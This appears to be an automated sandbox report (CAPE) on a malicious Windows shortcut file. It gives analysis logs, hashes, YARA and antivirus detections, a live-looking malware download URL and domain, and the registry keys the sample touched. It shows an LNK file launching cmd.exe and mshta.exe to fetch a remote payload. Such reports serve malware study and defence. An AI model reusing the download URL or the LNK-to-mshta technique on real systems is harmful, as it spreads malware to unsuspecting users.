2020-05-23 00:14:20,093 [root] INFO: b'C:\\NduTvp\\CAPE\\5152_50264255920142222552020|5152|0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?'
2020-05-23 00:14:20,093 [root] INFO: cape
2020-05-23 00:14:20,093 [root] INFO: ('dump_file', 'C:\\NduTvp\\CAPE\\5152_50264255920142222552020', b'0;?C:\\Windows\\System32\\cmd.exe;?C:\\Windows\\System32\\cmd.exe;?', ['5152'], 'procdump')
2020-05-23 00:14:20,125 [root] INFO: ('dump_file', 'C:\\NduTvp\\CAPE\\5152_50264255920142222552020', '', False, 'files')
2020-05-23 00:14:20,125 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x49e00.
2020-05-23 00:14:20,140 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 5152
2020-05-23 00:14:20,140 [lib.api.process] INFO: Termination confirmed for process 5152
2020-05-23 00:14:20,140 [root] INFO: Terminate event set for process 5152.
2020-05-23 00:14:20,140 [lib.api.process] INFO: Terminate event set for process 5120
2020-05-23 00:14:20,140 [root] DEBUG: Terminate Event: Attempting to dump process 5120
2020-05-23 00:14:20,140 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00CD0000.
2020-05-23 00:14:20,140 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-05-23 00:14:20,140 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00CD0000.
2020-05-23 00:14:20,156 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001576.
2020-05-23 00:14:20,156 [root] INFO: b'C:\\NduTvp\\CAPE\\5120_101841296420142222552020|5120|0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?'
2020-05-23 00:14:20,156 [root] INFO: cape
2020-05-23 00:14:20,156 [root] INFO: ('dump_file', 'C:\\NduTvp\\CAPE\\5120_101841296420142222552020', b'0;?C:\\Windows\\System32\\mshta.exe;?C:\\Windows\\System32\\mshta.exe;?', ['5120'], 'procdump')
2020-05-23 00:14:20,171 [root] INFO: ('dump_file', 'C:\\NduTvp\\CAPE\\5120_101841296420142222552020', '', False, 'files')
2020-05-23 00:14:20,171 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3400.
2020-05-23 00:14:20,171 [lib.api.process] INFO: Termination confirmed for process 5120
2020-05-23 00:14:20,171 [root] INFO: Terminate event set for process 5120.
2020-05-23 00:14:20,171 [root] INFO: Created shutdown mutex.
2020-05-23 00:14:20,171 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 5120
2020-05-23 00:14:20,171 [root] INFO: ('dump_file', 'C:\\Users\\Rebecca\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat', '', False, 'files')
2020-05-23 00:14:21,171 [root] INFO: Shutting down package.
2020-05-23 00:14:21,171 [root] INFO: Stopping auxiliary modules.
2020-05-23 00:14:21,281 [lib.common.results] WARNING: File C:\NduTvp\bin\procmon.xml doesn't exist anymore
2020-05-23 00:14:21,281 [root] INFO: Finishing auxiliary modules.
2020-05-23 00:14:21,281 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-05-23 00:14:21,281 [root] WARNING: Folder at path "C:\NduTvp\debugger" does not exist, skip.
2020-05-23 00:14:21,281 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7_4 win7_4 KVM 2020-05-23 00:22:31 2020-05-23 00:26:43

File Details

File Name file
File Size 2195 bytes
File Type MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=1, Archive, ctime=Mon Jul 13 23:58:06 2009, mtime=Mon Jul 13 23:58:06 2009, atime=Tue Jul 14 01:39:21 2009, length=43520, window=hide
MD5 0d928d04631084261f5a25868ea96af9
SHA1 53dc22573ef451b171ea8fd58d4909fec5502a62
SHA256 85e811256057167f1b01c1440ea534b92465b5efb7ab39a6c54748f7b9504532
SHA512 b7f3e363045a03b5d114ec9bb045285061ba8534a513e59120e78fce494cf9c9a27a32433fe5b788d2e21d7c67e98f171b644bedee812bbc898637a2bff0d21f
CRC32 75587C7F
Ssdeep 24:8k7ppQcGSxA0OV+/T6ahw8hO4o0c18euaoMVZ0KXQaR3+bCGO+/TDQA8PbQA8Pm:8k7/CxGBTHo1cKXv3AvO9U+
Yara
  • EXE_in_LNK - Identifies executable artefacts in shortcut (LNK) files. - Author: @bartblaze
  • Download_in_LNK - Identifies download artefacts in shortcut (LNK) files. - Author: @bartblaze

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Guard pages use detected - possible anti-debugging.
Dynamic (imported) function loading detected
Performs HTTP requests potentially not found in PCAP.
url: www.d01fa.net:80//images/D817583E/16364/11542/9f9d51bf/b0bdc66
A HTTP/S link was seen in a script or command line
Queries or connects to DNS-Over-HTTPS/DNS-Over-TLS domain or IP address
ip: 1.1.1.1
A script process initiated network activity
request: /images/d817583e/16364/11542/9f9d51bf/b0bdc66
File has been identified by 26 Antiviruses on VirusTotal as malicious
MicroWorld-eScan: Heur.BZC.YAX.Nioc.1.0443ACBC
McAfee: LNK/Agent-FSDJ!0D928D046310
Cyren: LNK/Trojan.MQII-5
Symantec: Trojan.Gen.MBT
TrendMicro-HouseCall: TROJ_FRS.VSNTD720
Avast: Other:Malware-gen [Trj]
Kaspersky: HEUR:Trojan.WinLNK.Agent.gen
BitDefender: Heur.BZC.YAX.Nioc.1.0443ACBC
AegisLab: Trojan.WinLNK.Acbc.4!c
Rising: Downloader.Mshta/LNK!1.BADA (CLASSIC)
Ad-Aware: Heur.BZC.YAX.Nioc.1.0443ACBC
Emsisoft: Heur.BZC.YAX.Nioc.1.0443ACBC (B)
DrWeb: Trojan.DownLoader33.28040
TrendMicro: TROJ_FRS.VSNTD720
McAfee-GW-Edition: LNK/Agent-FSDJ!0D928D046310
FireEye: Heur.BZC.YAX.Nioc.1.0443ACBC
Sophos: Troj/DownLnk-X
F-Prot: LNK/Trojan.MQII-5
Microsoft: Trojan:Win32/Casdet!rfn
ZoneAlarm: HEUR:Trojan.WinLNK.Agent.gen
GData: Heur.BZC.YAX.Nioc.1.0443ACBC
ALYac: Trojan.Downloader.LnK.Gen
MAX: malware (ai score=98)
Fortinet: LNK/DownLnk.X!tr
AVG: Other:Malware-gen [Trj]
Qihoo-360: Generic/Trojan.066
Attempts to modify proxy settings


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

DNS

Name Response Post-Analysis Lookup
www.d01fa.net [VT] 5.181.156.24 [VT]

Summary

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MultiSelectModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_CLASSES_ROOT\CLSID\{37EA3A21-7493-4208-A011-7F9EA79CE9F5}\shellex\MayChangeDefaultMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\Shell
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\ShellEx\LinkHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\LinkHandler
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
HKEY_CLASSES_ROOT\.ade
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_CLASSES_ROOT\.adp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_CLASSES_ROOT\.app
HKEY_CLASSES_ROOT\.asp
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_CLASSES_ROOT\.bas
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_CLASSES_ROOT\.bat
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_CLASSES_ROOT\.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_CLASSES_ROOT\.chm
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_CLASSES_ROOT\.cmd
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_CLASSES_ROOT\.com
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_CLASSES_ROOT\.cpl
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_CLASSES_ROOT\.crt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_CLASSES_ROOT\.csh
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_INITIALIZE_URLACTION_SHELLEXECUTE_TO_ALLOW_KB936610
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONES_DEFAULT_DRIVE_INTRANET_KB941000
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Progid
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellCompatibility\ProgIDs\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ddeexec
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\msHta.Exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32
\x1a60\xa7EY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLE_COMPAT_LOGGING
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
